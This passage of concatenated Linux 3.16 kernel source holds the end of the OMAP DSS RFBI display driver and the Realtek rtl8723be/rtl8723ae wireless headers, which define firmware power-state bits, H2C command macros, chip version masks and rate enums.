rfbi.timings.sync_pclk_edge = OMAPDSS_DRIVE_SIG_OPPOSITE_EDGES;
dss_mgr_set_timings(mgr, &rfbi.timings);
}
static int rfbi_display_enable(struct omap_dss_device *dssdev)
{
struct omap_dss_device *out = &rfbi.output;
int r;
if (out == NULL || out->manager == NULL) {
DSSERR("failed to enable display: no output/manager\n");
return -ENODEV;
}
r = rfbi_runtime_get();
if (r)
return r;
r = dss_mgr_register_framedone_handler(out->manager,
framedone_callback, NULL);
if (r) {
DSSERR("can't get FRAMEDONE irq\n");
goto err1;
}
rfbi_config_lcd_manager(dssdev);
rfbi_configure_bus(dssdev->phy.rfbi.channel, rfbi.pixel_size,
rfbi.data_lines);
rfbi_set_timings(dssdev->phy.rfbi.channel, &rfbi.intf_timings);
return 0;
err1:
rfbi_runtime_put();
return r;
}
static void rfbi_display_disable(struct omap_dss_device *dssdev)
{
struct omap_dss_device *out = &rfbi.output;
dss_mgr_unregister_framedone_handler(out->manager,
framedone_callback, NULL);
rfbi_runtime_put();
}
static int rfbi_init_display(struct omap_dss_device *dssdev)
{
rfbi.dssdev[dssdev->phy.rfbi.channel] = dssdev;
return 0;
}
static void rfbi_init_output(struct platform_device *pdev)
{
struct omap_dss_device *out = &rfbi.output;
out->dev = &pdev->dev;
out->id = OMAP_DSS_OUTPUT_DBI;
out->output_type = OMAP_DISPLAY_TYPE_DBI;
out->name = "rfbi.0";
out->dispc_channel = OMAP_DSS_CHANNEL_LCD;
out->owner = THIS_MODULE;
omapdss_register_output(out);
}
static void __exit rfbi_uninit_output(struct platform_device *pdev)
{
struct omap_dss_device *out = &rfbi.output;
omapdss_unregister_output(out);
}
/* RFBI HW IP initialisation */
static int omap_rfbihw_probe(struct platform_device *pdev)
{
u32 rev;
struct resource *rfbi_mem;
struct clk *clk;
int r;
rfbi.pdev = pdev;
sema_init(&rfbi.bus_lock, 1);
rfbi_mem = platform_get_resource(rfbi.pdev, IORESOURCE_MEM, 0);
if (!rfbi_mem) {
DSSERR("can't get IORESOURCE_MEM RFBI\n");
return -EINVAL;
}
rfbi.base = devm_ioremap(&pdev->dev, rfbi_mem->start,
resource_size(rfbi_mem));
if (!rfbi.base) {
DSSERR("can't ioremap RFBI\n");
return -ENOMEM;
}
clk = clk_get(&pdev->dev, "ick");
if (IS_ERR(clk)) {
DSSERR("can't get ick\n");
return PTR_ERR(clk);
}
rfbi.l4_khz = clk_get_rate(clk) / 1000;
clk_put(clk);
pm_runtime_enable(&pdev->dev);
r = rfbi_runtime_get();
if (r)
goto err_runtime_get;
msleep(10);
rev = rfbi_read_reg(RFBI_REVISION);
dev_dbg(&pdev->dev, "OMAP RFBI rev %d.%d\n",
FLD_GET(rev, 7, 4), FLD_GET(rev, 3, 0));
rfbi_runtime_put();
dss_debugfs_create_file("rfbi", rfbi_dump_regs);
rfbi_init_output(pdev);
return 0;
err_runtime_get:
pm_runtime_disable(&pdev->dev);
return r;
}
static int __exit omap_rfbihw_remove(struct platform_device *pdev)
{
rfbi_uninit_output(pdev);
pm_runtime_disable(&pdev->dev);
return 0;
}
static int rfbi_runtime_suspend(struct device *dev)
{
dispc_runtime_put();
return 0;
}
static int rfbi_runtime_resume(struct device *dev)
{
int r;
r = dispc_runtime_get();
if (r < 0)
return r;
return 0;
}
static const struct dev_pm_ops rfbi_pm_ops = {
.runtime_suspend = rfbi_runtime_suspend,
.runtime_resume = rfbi_runtime_resume,
};
static struct platform_driver omap_rfbihw_driver = {
.probe = omap_rfbihw_probe,
.remove = __exit_p(omap_rfbihw_remove),
.driver = {
.name = "omapdss_rfbi",
.owner = THIS_MODULE,
.pm = &rfbi_pm_ops,
},
};
int __init rfbi_init_platform_driver(void)
{
return platform_driver_register(&omap_rfbihw_driver);
}
void __exit rfbi_uninit_platform_driver(void)
{
platform_driver_unregister(&omap_rfbihw_driver);
}
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723be/fw.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#ifndef __RTL8723BE__FW__H__
#define __RTL8723BE__FW__H__
#define FW_8192C_SIZE 0x8000
#define FW_8192C_START_ADDRESS 0x1000
#define FW_8192C_END_ADDRESS 0x5FFF
#define FW_8192C_PAGE_SIZE 4096
#define FW_8192C_POLLING_DELAY 5
#define FW_8192C_POLLING_TIMEOUT_COUNT 6000
#define IS_FW_HEADER_EXIST(_pfwhdr) \
((_pfwhdr->signature&0xFFF0) == 0x5300)
#define USE_OLD_WOWLAN_DEBUG_FW 0
#define H2C_8723BE_RSVDPAGE_LOC_LEN 5
#define H2C_8723BE_PWEMODE_LENGTH 5
#define H2C_8723BE_JOINBSSRPT_LENGTH 1
#define H2C_8723BE_AP_OFFLOAD_LENGTH 3
#define H2C_8723BE_WOWLAN_LENGTH 3
#define H2C_8723BE_KEEP_ALIVE_CTRL_LENGTH 3
#if (USE_OLD_WOWLAN_DEBUG_FW == 0)
#define H2C_8723BE_REMOTE_WAKE_CTRL_LEN 1
#else
#define H2C_8723BE_REMOTE_WAKE_CTRL_LEN 3
#endif
#define H2C_8723BE_AOAC_GLOBAL_INFO_LEN 2
#define H2C_8723BE_AOAC_RSVDPAGE_LOC_LEN 7
/* Fw PS state for RPWM.
*BIT[2:0] = HW state
*BIT[3] = Protocol PS state, 1: register active state , 0: register sleep state
*BIT[4] = sub-state
*/
#define FW_PS_GO_ON BIT(0)
#define FW_PS_TX_NULL BIT(1)
#define FW_PS_RF_ON BIT(2)
#define FW_PS_REGISTER_ACTIVE BIT(3)
#define FW_PS_DPS BIT(0)
#define FW_PS_LCLK (FW_PS_DPS)
#define FW_PS_RF_OFF BIT(1)
#define FW_PS_ALL_ON BIT(2)
#define FW_PS_ST_ACTIVE BIT(3)
#define FW_PS_ISR_ENABLE BIT(4)
#define FW_PS_IMR_ENABLE BIT(5)
#define FW_PS_ACK BIT(6)
#define FW_PS_TOGGLE BIT(7)
/* 88E RPWM value*/
/* BIT[0] = 1: 32k, 0: 40M*/
#define FW_PS_CLOCK_OFF BIT(0) /* 32k*/
#define FW_PS_CLOCK_ON 0 /*40M*/
#define FW_PS_STATE_MASK (0x0F)
#define FW_PS_STATE_HW_MASK (0x07)
/*ISR_ENABLE, IMR_ENABLE, and PS mode should be inherited.*/
#define FW_PS_STATE_INT_MASK (0x3F)
#define FW_PS_STATE(x) (FW_PS_STATE_MASK & (x))
#define FW_PS_STATE_HW(x) (FW_PS_STATE_HW_MASK & (x))
#define FW_PS_STATE_INT(x) (FW_PS_STATE_INT_MASK & (x))
#define FW_PS_ISR_VAL(x) ((x) & 0x70)
#define FW_PS_IMR_MASK(x) ((x) & 0xDF)
#define FW_PS_KEEP_IMR(x) ((x) & 0x20)
#define FW_PS_STATE_S0 (FW_PS_DPS)
#define FW_PS_STATE_S1 (FW_PS_LCLK)
#define FW_PS_STATE_S2 (FW_PS_RF_OFF)
#define FW_PS_STATE_S3 (FW_PS_ALL_ON)
#define FW_PS_STATE_S4 ((FW_PS_ST_ACTIVE) | (FW_PS_ALL_ON))
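/* Resulting numeric state values: S0/S1 = 0x01, S2 = 0x02, S3 = 0x04,
 * S4 = 0x0C (ST_ACTIVE | ALL_ON).
 */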
/* ((FW_PS_RF_ON) | (FW_PS_REGISTER_ACTIVE))*/
#define FW_PS_STATE_ALL_ON_88E (FW_PS_CLOCK_ON)
/* (FW_PS_RF_ON)*/
#define FW_PS_STATE_RF_ON_88E (FW_PS_CLOCK_ON)
/* 0x0*/
#define FW_PS_STATE_RF_OFF_88E (FW_PS_CLOCK_ON)
/* (FW_PS_STATE_RF_OFF)*/
#define FW_PS_STATE_RF_OFF_LOW_PWR_88E (FW_PS_CLOCK_OFF)
#define FW_PS_STATE_ALL_ON_92C (FW_PS_STATE_S4)
#define FW_PS_STATE_RF_ON_92C (FW_PS_STATE_S3)
#define FW_PS_STATE_RF_OFF_92C (FW_PS_STATE_S2)
#define FW_PS_STATE_RF_OFF_LOW_PWR_92C (FW_PS_STATE_S1)
/* For 88E H2C PwrMode Cmd ID 5.*/
#define FW_PWR_STATE_ACTIVE ((FW_PS_RF_ON) | (FW_PS_REGISTER_ACTIVE))
#define FW_PWR_STATE_RF_OFF 0
#define FW_PS_IS_ACK(x) ((x) & FW_PS_ACK)
#define FW_PS_IS_CLK_ON(x) ((x) & (FW_PS_RF_OFF | FW_PS_ALL_ON))
#define FW_PS_IS_RF_ON(x) ((x) & (FW_PS_ALL_ON))
#define FW_PS_IS_ACTIVE(x) ((x) & (FW_PS_ST_ACTIVE))
#define FW_PS_IS_CPWM_INT(x) ((x) & 0x40)
#define FW_CLR_PS_STATE(x) ((x) = ((x) & (0xF0)))
#define IS_IN_LOW_POWER_STATE_88E(fwpsstate) \
(FW_PS_STATE(fwpsstate) == FW_PS_CLOCK_OFF)
#define FW_PWR_STATE_ACTIVE ((FW_PS_RF_ON) | (FW_PS_REGISTER_ACTIVE))
#define FW_PWR_STATE_RF_OFF 0
#define pagenum_128(_len) (u32)(((_len)>>7) + ((_len)&0x7F ? 1 : 0))
#define SET_88E_H2CCMD_WOWLAN_FUNC_ENABLE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_PATTERN_MATCH_ENABLE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 1, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_MAGIC_PKT_ENABLE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 2, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_UNICAST_PKT_ENABLE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 3, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_ALL_PKT_DROP(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 4, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_GPIO_ACTIVE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 5, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_REKEY_WAKE_UP(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 6, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_DISCONNECT_WAKE_UP(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 7, 1, __val)
#define SET_88E_H2CCMD_WOWLAN_GPIONUM(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
#define SET_88E_H2CCMD_WOWLAN_GPIO_DURATION(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val)
#define SET_H2CCMD_PWRMODE_PARM_MODE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val)
#define SET_H2CCMD_PWRMODE_PARM_RLBM(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 4, __val)
#define SET_H2CCMD_PWRMODE_PARM_SMART_PS(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 4, 4, __val)
#define SET_H2CCMD_PWRMODE_PARM_AWAKE_INTERVAL(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val)
#define SET_H2CCMD_PWRMODE_PARM_ALL_QUEUE_UAPSD(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+3, 0, 8, __val)
#define SET_H2CCMD_PWRMODE_PARM_PWR_STATE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+4, 0, 8, __val)
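/* The five PwrMode parameter bytes set above are laid out as:
 * byte0 = mode, byte1[3:0] = RLBM, byte1[7:4] = smart PS,
 * byte2 = awake interval, byte3 = all-queue uAPSD, byte4 = power state.
 */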
#define GET_88E_H2CCMD_PWRMODE_PARM_MODE(__ph2ccmd) \
LE_BITS_TO_1BYTE(__ph2ccmd, 0, 8)
#define SET_H2CCMD_JOINBSSRPT_PARM_OPMODE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val)
#define SET_H2CCMD_RSVDPAGE_LOC_PROBE_RSP(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val)
#define SET_H2CCMD_RSVDPAGE_LOC_PSPOLL(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
#define SET_H2CCMD_RSVDPAGE_LOC_NULL_DATA(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val)
/* AP_OFFLOAD */
#define SET_H2CCMD_AP_OFFLOAD_ON(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val)
#define SET_H2CCMD_AP_OFFLOAD_HIDDEN(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
#define SET_H2CCMD_AP_OFFLOAD_DENYANY(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val)
#define SET_H2CCMD_AP_OFFLOAD_WAKEUP_EVT_RPT(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+3, 0, 8, __val)
/* Keep Alive Control*/
#define SET_88E_H2CCMD_KEEP_ALIVE_ENABLE(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 1, __val)
#define SET_88E_H2CCMD_KEEP_ALIVE_ACCPEPT_USER_DEFINED(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 1, 1, __val)
#define SET_88E_H2CCMD_KEEP_ALIVE_PERIOD(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
/*REMOTE_WAKE_CTRL */
#define SET_88E_H2CCMD_REMOTE_WAKE_CTRL_EN(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 1, __val)
#if (USE_OLD_WOWLAN_DEBUG_FW == 0)
#define SET_88E_H2CCMD_REMOTE_WAKE_CTRL_ARP_OFFLOAD_EN(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 1, 1, __val)
#define SET_88E_H2CCMD_REMOTE_WAKE_CTRL_NDP_OFFLOAD_EN(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 2, 1, __val)
#define SET_88E_H2CCMD_REMOTE_WAKE_CTRL_GTK_OFFLOAD_EN(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 3, 1, __val)
#else
#define SET_88E_H2CCMD_REMOTE_WAKE_CTRL_PAIRWISE_ENC_ALG(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
#define SET_88E_H2CCMD_REMOTE_WAKE_CTRL_GROUP_ENC_ALG(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val)
#endif
/* GTK_OFFLOAD */
#define SET_88E_H2CCMD_AOAC_GLOBAL_INFO_PAIRWISE_ENC_ALG(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val)
#define SET_88E_H2CCMD_AOAC_GLOBAL_INFO_GROUP_ENC_ALG(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
/* AOAC_RSVDPAGE_LOC */
#define SET_88E_H2CCMD_AOAC_RSVDPAGE_LOC_REM_WAKE_CTRL_INFO(__ph2ccmd, __val)\
SET_BITS_TO_LE_1BYTE((__ph2ccmd), 0, 8, __val)
#define SET_88E_H2CCMD_AOAC_RSVDPAGE_LOC_ARP_RSP(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val)
#define SET_88E_H2CCMD_AOAC_RSVDPAGE_LOC_NEIGHBOR_ADV(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val)
#define SET_88E_H2CCMD_AOAC_RSVDPAGE_LOC_GTK_RSP(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+3, 0, 8, __val)
#define SET_88E_H2CCMD_AOAC_RSVDPAGE_LOC_GTK_INFO(__ph2ccmd, __val) \
SET_BITS_TO_LE_1BYTE((__ph2ccmd)+4, 0, 8, __val)
void rtl8723be_set_fw_pwrmode_cmd(struct ieee80211_hw *hw, u8 mode);
void rtl8723be_set_fw_ap_off_load_cmd(struct ieee80211_hw *hw,
u8 ap_offload_enable);
void rtl8723be_fill_h2c_cmd(struct ieee80211_hw *hw, u8 element_id,
u32 cmd_len, u8 *p_cmdbuffer);
void rtl8723be_firmware_selfreset(struct ieee80211_hw *hw);
void rtl8723be_set_fw_rsvdpagepkt(struct ieee80211_hw *hw,
bool dl_finished);
void rtl8723be_set_fw_joinbss_report_cmd(struct ieee80211_hw *hw, u8 mstatus);
int rtl8723be_download_fw(struct ieee80211_hw *hw,
bool buse_wake_on_wlan_fw);
void rtl8723be_set_p2p_ps_offload_cmd(struct ieee80211_hw *hw,
u8 p2p_ps_state);
#endif
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723be/def.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#ifndef __RTL8723BE_DEF_H__
#define __RTL8723BE_DEF_H__
#define HAL_RETRY_LIMIT_INFRA 48
#define HAL_RETRY_LIMIT_AP_ADHOC 7
#define RESET_DELAY_8185 20
#define RT_IBSS_INT_MASKS (IMR_BCNINT | IMR_TBDOK | IMR_TBDER)
#define RT_AC_INT_MASKS (IMR_VIDOK | IMR_VODOK | IMR_BEDOK|IMR_BKDOK)
#define NUM_OF_FIRMWARE_QUEUE 10
#define NUM_OF_PAGES_IN_FW 0x100
#define NUM_OF_PAGE_IN_FW_QUEUE_BK 0x07
#define NUM_OF_PAGE_IN_FW_QUEUE_BE 0x07
#define NUM_OF_PAGE_IN_FW_QUEUE_VI 0x07
#define NUM_OF_PAGE_IN_FW_QUEUE_VO 0x07
#define NUM_OF_PAGE_IN_FW_QUEUE_HCCA 0x0
#define NUM_OF_PAGE_IN_FW_QUEUE_CMD 0x0
#define NUM_OF_PAGE_IN_FW_QUEUE_MGNT 0x02
#define NUM_OF_PAGE_IN_FW_QUEUE_HIGH 0x02
#define NUM_OF_PAGE_IN_FW_QUEUE_BCN 0x2
#define NUM_OF_PAGE_IN_FW_QUEUE_PUB 0xA1
#define NUM_OF_PAGE_IN_FW_QUEUE_BK_DTM 0x026
#define NUM_OF_PAGE_IN_FW_QUEUE_BE_DTM 0x048
#define NUM_OF_PAGE_IN_FW_QUEUE_VI_DTM 0x048
#define NUM_OF_PAGE_IN_FW_QUEUE_VO_DTM 0x026
#define NUM_OF_PAGE_IN_FW_QUEUE_PUB_DTM 0x00
#define MAX_LINES_HWCONFIG_TXT 1000
#define MAX_BYTES_LINE_HWCONFIG_TXT 256
#define SW_THREE_WIRE 0
#define HW_THREE_WIRE 2
#define BT_DEMO_BOARD 0
#define BT_QA_BOARD 1
#define BT_FPGA 2
#define HAL_PRIME_CHNL_OFFSET_DONT_CARE 0
#define HAL_PRIME_CHNL_OFFSET_LOWER 1
#define HAL_PRIME_CHNL_OFFSET_UPPER 2
#define MAX_H2C_QUEUE_NUM 10
#define RX_MPDU_QUEUE 0
#define RX_CMD_QUEUE 1
#define RX_MAX_QUEUE 2
#define AC2QUEUEID(_AC) (_AC)
#define C2H_RX_CMD_HDR_LEN 8
#define GET_C2H_CMD_CMD_LEN(__prxhdr) \
LE_BITS_TO_4BYTE((__prxhdr), 0, 16)
#define GET_C2H_CMD_ELEMENT_ID(__prxhdr) \
LE_BITS_TO_4BYTE((__prxhdr), 16, 8)
#define GET_C2H_CMD_CMD_SEQ(__prxhdr) \
LE_BITS_TO_4BYTE((__prxhdr), 24, 7)
#define GET_C2H_CMD_CONTINUE(__prxhdr) \
LE_BITS_TO_4BYTE((__prxhdr), 31, 1)
#define GET_C2H_CMD_CONTENT(__prxhdr) \
((u8 *)(__prxhdr) + C2H_RX_CMD_HDR_LEN)
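/* A C2H Rx command therefore starts with an 8-byte header: bits [15:0]
 * carry the command length, [23:16] the element id, [30:24] the sequence
 * number and bit 31 the "continue" flag; the payload follows the header.
 */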
#define GET_C2H_CMD_FEEDBACK_ELEMENT_ID(__pcmdfbhdr) \
LE_BITS_TO_4BYTE((__pcmdfbhdr), 0, 8)
#define GET_C2H_CMD_FEEDBACK_CCX_LEN(__pcmdfbhdr) \
LE_BITS_TO_4BYTE((__pcmdfbhdr), 8, 8)
#define GET_C2H_CMD_FEEDBACK_CCX_CMD_CNT(__pcmdfbhdr) \
LE_BITS_TO_4BYTE((__pcmdfbhdr), 16, 16)
#define GET_C2H_CMD_FEEDBACK_CCX_MAC_ID(__pcmdfbhdr) \
LE_BITS_TO_4BYTE(((__pcmdfbhdr) + 4), 0, 5)
#define GET_C2H_CMD_FEEDBACK_CCX_VALID(__pcmdfbhdr) \
LE_BITS_TO_4BYTE(((__pcmdfbhdr) + 4), 7, 1)
#define GET_C2H_CMD_FEEDBACK_CCX_RETRY_CNT(__pcmdfbhdr) \
LE_BITS_TO_4BYTE(((__pcmdfbhdr) + 4), 8, 5)
#define GET_C2H_CMD_FEEDBACK_CCX_TOK(__pcmdfbhdr) \
LE_BITS_TO_4BYTE(((__pcmdfbhdr) + 4), 15, 1)
#define GET_C2H_CMD_FEEDBACK_CCX_QSEL(__pcmdfbhdr) \
LE_BITS_TO_4BYTE(((__pcmdfbhdr) + 4), 16, 4)
#define GET_C2H_CMD_FEEDBACK_CCX_SEQ(__pcmdfbhdr) \
LE_BITS_TO_4BYTE(((__pcmdfbhdr) + 4), 20, 12)
#define CHIP_BONDING_IDENTIFIER(_value) (((_value)>>22)&0x3)
#define CHIP_BONDING_92C_1T2R 0x1
#define CHIP_8723 BIT(0)
#define CHIP_8723B (BIT(1) | BIT(2))
#define NORMAL_CHIP BIT(3)
#define RF_TYPE_1T1R (~(BIT(4) | BIT(5) | BIT(6)))
#define RF_TYPE_1T2R BIT(4)
#define RF_TYPE_2T2R BIT(5)
#define CHIP_VENDOR_UMC BIT(7)
#define B_CUT_VERSION BIT(12)
#define C_CUT_VERSION BIT(13)
#define D_CUT_VERSION ((BIT(12) | BIT(13)))
#define E_CUT_VERSION BIT(14)
#define RF_RL_ID (BIT(31) | BIT(30) | BIT(29) | BIT(28))
/* MASK */
#define IC_TYPE_MASK (BIT(0) | BIT(1) | BIT(2))
#define CHIP_TYPE_MASK BIT(3)
#define RF_TYPE_MASK (BIT(4) | BIT(5) | BIT(6))
#define MANUFACTUER_MASK BIT(7)
#define ROM_VERSION_MASK (BIT(11) | BIT(10) | BIT(9) | BIT(8))
#define CUT_VERSION_MASK (BIT(15) | BIT(14) | BIT(13) | BIT(12))
/* Get element */
#define GET_CVID_IC_TYPE(version) ((version) & IC_TYPE_MASK)
#define GET_CVID_CHIP_TYPE(version) ((version) & CHIP_TYPE_MASK)
#define GET_CVID_RF_TYPE(version) ((version) & RF_TYPE_MASK)
#define GET_CVID_MANUFACTUER(version) ((version) & MANUFACTUER_MASK)
#define GET_CVID_ROM_VERSION(version) ((version) & ROM_VERSION_MASK)
#define GET_CVID_CUT_VERSION(version) ((version) & CUT_VERSION_MASK)
#define IS_92C_SERIAL(version) ((IS_81XXC(version) && IS_2T2R(version)) ?\
true : false)
#define IS_81XXC(version) ((GET_CVID_IC_TYPE(version) == 0) ?\
true : false)
#define IS_8723_SERIES(version) ((GET_CVID_IC_TYPE(version) == CHIP_8723) ?\
true : false)
#define IS_1T1R(version) ((GET_CVID_RF_TYPE(version)) ? false : true)
#define IS_1T2R(version) ((GET_CVID_RF_TYPE(version) == RF_TYPE_1T2R)\
? true : false)
#define IS_2T2R(version) ((GET_CVID_RF_TYPE(version) == RF_TYPE_2T2R)\
? true : false)
enum rf_optype {
RF_OP_BY_SW_3WIRE = 0,
RF_OP_BY_FW,
RF_OP_MAX
};
enum rf_power_state {
RF_ON,
RF_OFF,
RF_SLEEP,
RF_SHUT_DOWN,
};
enum power_save_mode {
POWER_SAVE_MODE_ACTIVE,
POWER_SAVE_MODE_SAVE,
};
enum power_polocy_config {
POWERCFG_MAX_POWER_SAVINGS,
POWERCFG_GLOBAL_POWER_SAVINGS,
POWERCFG_LOCAL_POWER_SAVINGS,
POWERCFG_LENOVO,
};
enum interface_select_pci {
INTF_SEL1_MINICARD = 0,
INTF_SEL0_PCIE = 1,
INTF_SEL2_RSV = 2,
INTF_SEL3_RSV = 3,
};
enum rtl_desc_qsel {
QSLT_BK = 0x2,
QSLT_BE = 0x0,
QSLT_VI = 0x5,
QSLT_VO = 0x7,
QSLT_BEACON = 0x10,
QSLT_HIGH = 0x11,
QSLT_MGNT = 0x12,
QSLT_CMD = 0x13,
};
enum rtl_desc8723e_rate {
DESC92C_RATE1M = 0x00,
DESC92C_RATE2M = 0x01,
DESC92C_RATE5_5M = 0x02,
DESC92C_RATE11M = 0x03,
DESC92C_RATE6M = 0x04,
DESC92C_RATE9M = 0x05,
DESC92C_RATE12M = 0x06,
DESC92C_RATE18M = 0x07,
DESC92C_RATE24M = 0x08,
DESC92C_RATE36M = 0x09,
DESC92C_RATE48M = 0x0a,
DESC92C_RATE54M = 0x0b,
DESC92C_RATEMCS0 = 0x0c,
DESC92C_RATEMCS1 = 0x0d,
DESC92C_RATEMCS2 = 0x0e,
DESC92C_RATEMCS3 = 0x0f,
DESC92C_RATEMCS4 = 0x10,
DESC92C_RATEMCS5 = 0x11,
DESC92C_RATEMCS6 = 0x12,
DESC92C_RATEMCS7 = 0x13,
DESC92C_RATEMCS8 = 0x14,
DESC92C_RATEMCS9 = 0x15,
DESC92C_RATEMCS10 = 0x16,
DESC92C_RATEMCS11 = 0x17,
DESC92C_RATEMCS12 = 0x18,
DESC92C_RATEMCS13 = 0x19,
DESC92C_RATEMCS14 = 0x1a,
DESC92C_RATEMCS15 = 0x1b,
DESC92C_RATEMCS15_SG = 0x1c,
DESC92C_RATEMCS32 = 0x20,
};
enum rx_packet_type {
NORMAL_RX,
TX_REPORT1,
TX_REPORT2,
HIS_REPORT,
};
struct phy_sts_cck_8723e_t {
u8 adc_pwdb_X[4];
u8 sq_rpt;
u8 cck_agc_rpt;
};
struct h2c_cmd_8723e {
u8 element_id;
u32 cmd_len;
u8 *p_cmdbuffer;
};
#endif
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723ae/dm.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2012 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along with
* this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110, USA
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
****************************************************************************
*/
#ifndef __RTL8723E_DM_H__
#define __RTL8723E_DM_H__
#define HAL_DM_HIPWR_DISABLE BIT(1)
#define OFDM_TABLE_SIZE 37
#define CCK_TABLE_SIZE 33
#define DM_DIG_THRESH_HIGH 40
#define DM_DIG_THRESH_LOW 35
#define DM_FALSEALARM_THRESH_LOW 400
#define DM_FALSEALARM_THRESH_HIGH 1000
#define DM_DIG_MAX 0x3e
#define DM_DIG_MIN 0x1e
#define DM_DIG_FA_UPPER 0x32
#define DM_DIG_FA_LOWER 0x20
#define DM_DIG_FA_TH0 0x20
#define DM_DIG_FA_TH1 0x100
#define DM_DIG_FA_TH2 0x200
#define DM_DIG_BACKOFF_MAX 12
#define DM_DIG_BACKOFF_MIN -4
